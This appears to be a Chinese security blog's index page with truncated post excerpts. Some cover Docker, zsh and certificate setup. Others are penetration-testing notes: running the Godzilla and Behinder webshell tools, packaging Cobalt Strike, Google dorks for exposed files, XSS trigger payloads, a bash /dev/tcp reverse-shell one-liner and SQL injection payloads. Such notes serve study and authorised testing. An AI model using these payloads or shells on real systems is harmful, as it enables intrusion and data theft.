Docker V2raya ipsec-vpn-server
Open The Ports Install Docker12345678910111213141516171819curl -o /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.repoyum makecache && yum update -y && yum upgrade -y# https://docs.docker.com/engine/install/centos/yum remove docker \ docker-client \ docker-client-latest \ docker-common \ docker-latest \ docker-latest-logrotate \ docker-logrotate \ ...
Mac M1 用户也能用上 Godzilla Behinder
Behinder12cd /Applications/Godzilla.app/Contents/app//Library/Java/JavaVirtualMachines/jdk15/Contents/Home/bin/java --module-path "/Applications/Behinder.app/Contents/app/lib" --add-modules=javafx.controls --add-modules=javafx.fxml --add-modules=javafx.base --add-modules=javafx.graphics --add-modules=javafx.web -Xdock:icon=/Applications/Behinder.app/Contents/app/app.icns -jar...
WakeOnLan_Python
preview attention1234chmod 777 wolcp wol /usr/bin/wolvi /usr/bin/wolwol / wol 1.1.1.1 / wol google.com 1234DestIp = "localhost"DestNatIp = "127.0.0.1"DestMacAddress = "B43E98F386A4"DestPort = 9 #!/usr/bin/python3 # _*_ coding: utf-8 _*_ import socket, binascii, os, sys, requests, re def banaer(): os.system("clear") print("\n\033[24;37;34m __ __ ____ \033[0m") print("\033[24;37;32m \ \/ / | _ \ ...
zsh 配置文件
1yum install zsh -y 1apt install zsh -y oh-my-zsh12sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"sh -c "$(wget https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh -O -)" zsh-syntax-highlighting1git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting zsh-autosuggestions1git clone https://github.com/zsh-users/zsh-autosuggestions.git...
自签安全证书
GitHub: ssl-tools 💻About For a more secure network environment, self built Ca and self issued SSL certificate 为了更安全的网络环境 自建 CA 并自签发 SSL 证书 Remember to check Debug 记得查看 Debug 推荐 ssleye myssl sslchecker 在线生成根证书 🤓Preview 👍HelpThank you AndroidOL for your help ! 12./ssl_tools.sh 1.1.1.1 admin admin@admin.com./ssl_tools.sh admin@admin.com admin admin@admin.com 🗼DebugIt only supports Linux and runs perfectly in CentOS Mac os Windows XRSec has the right to modify and interpret this...
关于Mac app打包[二]
经过连续多日的艰苦奋斗,俺终于摸到了门 生成app 首先 创建一个文件夹 app 进入文件夹 把要用到的全部复制进去 接着运行命令 jpackage 生成 app (注意有$符号需要反斜杠) 1234567jpackage --name CobaltStrike --input . \--main-jar CobaltStrike.jar \--type dmg \--app-version "4.2" \--copyright "Xrsec" \--description "CobaltStrike with JDK and Chinese. Mac zulu-Jdk15 CobaltStrike 4.2" \--icon app.icns --java-options "-javaagent:\$APPDIR/CobaltStrikeCN.jar -Dfile.encoding=utf-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap...
Mac M1 实用技术方案
🧬Home-brew 升级3.0取消终端Rosetta🎁 首相找到终端app –> 显示简介 –> 取消Rosetta 重新安装Home-brew 🎁 重新启动终端app ->> 打开你的 Clash 复制终端 酸酸乳 123456789export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890# 卸载 homebrew/bin/bash -c "$(curl -fsSL https://cdn.jsdelivr.net/gh/Homebrew/install@master/uninstall.sh)"# 你也可以选这强制删掉homebrew# which brew# cd# sudo rm-rf homebrew/bin/bash -c "$(curl -fsSL...
搜索引擎信息收集
转载自 Norah C.IV Google是一款功能强大的搜索引擎,能够根据robots协议抓取互联网上几乎所有页面,其中包括大量账号密码等敏感信息。GHDB(Google Hacking Database)存放了大量敏感信息,Google Hacking是指利用Google等搜索引擎搜索信息来进行入侵的技术和行为,攻击者利用搜索引擎高级指令能够轻松获取指定的敏感信息。以下是利用GHDB结合搜索引擎高级指令进行敏感信息获取的对应表: 1、搜索特殊的文件后缀在此过程中,测试人员会对域进行如下内容的搜索: 搜索内容 说明 site:test.com inurl:jsp.bak 搜索站点中是否存在后缀为jsp.bak的文件,即某些jsp的备份文件 site:test.com filetype:sql 搜索站点中是否存在SQL脚本文件 site:test.com inurl:log 搜索站点中是否存在应用程序日志文件,如ftp日志、oracle日志等 site:test.com...
web渗透测试清单
转载自 Norah...
HTTP请求码对照表
转载自 Norah C.IV Status Code状态码详解对照表 状态码 含义 100 客户端应当继续发送请求。这个临时响应是用来通知客户端它的部分请求已经被服务器接收,且仍未被拒绝。客户端应当继续发送请求的剩余部分,或者如果请求已经完成,忽略这个响应。服务器必须在请求完成后向客户端发送一个最终响应。 101 服务器已经理解了客户端的请求,并将通过Upgrade 消息头通知客户端采用不同的协议来完成这个请求。在发送完这个响应最后的空行后,服务器将会切换到在Upgrade 消息头中定义的那些协议。 只有在切换新的协议更有好处的时候才应该采取类似措施。例如,切换到新的HTTP 版本比旧版本更有优势,或者切换到一个实时且同步的协议以传送利用此类特性的资源。 102 由WebDAV(RFC 2518)扩展的状态码,代表处理将被继续执行。 200 请求已成功,请求所希望的响应头或数据体将随此响应返回。 201 请求已经被实现,而且有一个新的资源已经依据请求的需要而建立,且其 URI 已经随Location...
XSS触发语句
转载自 Norah C.IV 一、标准语句1<script>alert(/XSS/)</script> 二、尝试大小写1<sCript>alert(1)</scRipt> 三、使用<img>标签123456789101、windows事件<img src="x" onerror=alert(1)><img src="1" onerror=eval("alert('xss')")>//图片加载错误时触发2、鼠标事件<img src=1 onmouseover="alert(1)">//鼠标指针移动到元素时触发<img src=1 onmouseout="alert(1)">//鼠标指针移出时触发 四、使用<a>标签12345671、使用href属性<a...
UPnP协议
转载自 Norah C.IV更多:SSDP协议 SOAP协议 一、UPnP简介通用即插即用(英语:Universal Plug and Play,简称UPnP)是由“通用即插即用论坛”(UPnP™ Forum)推广的一套网络协议,主要用于设备的智能互联互通。 UPnP 可以当作是一个相对复杂的网络协议,毕竟它包含了很多其他的网络协议,如:ip(设备寻址)、tcp、udp(数据打包发送)、http(数据传递格式)等。 UPnP 可以扩展,也就是说还可以在启动加入其他的协议,比如:传递数据时,http协议再包一层json协议,或者数据传递使用xml协议来传递等等。 UPnP 之所以强大,很大一个原因是基于互联网,这样对等设备可以通过互联网自由交互,也就是说任何可以联网的设备都可以使用UPnP协议。 二、UPnP用法(1)寻址——Addressing因为基于互联网,需要满足基本的p2p协议,所以就必须要寻址,寻址的过程就是设备获取ip地址的过程,这个里面一般都使用DHCP(Dynamic Host Configuration...
渗透工具和查询平台
转载自 Norah...
反弹shell的各种姿势
转载自 Norah C.IV转载自 Bypass 在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。) Linux 反弹shell姿势一:bash反弹12bash -i >& /dev/tcp/192.168.99.242/1234 0>&1base64版:bash -c...
SQL手工注入总结
转载自 Norah C.IV转载自 乌雲安全 虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正! 0x01 Mysql 手工注入1.1 联合注入123?id=1' order by 4--+?id=0' union select 1,2,3,database()--+?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where...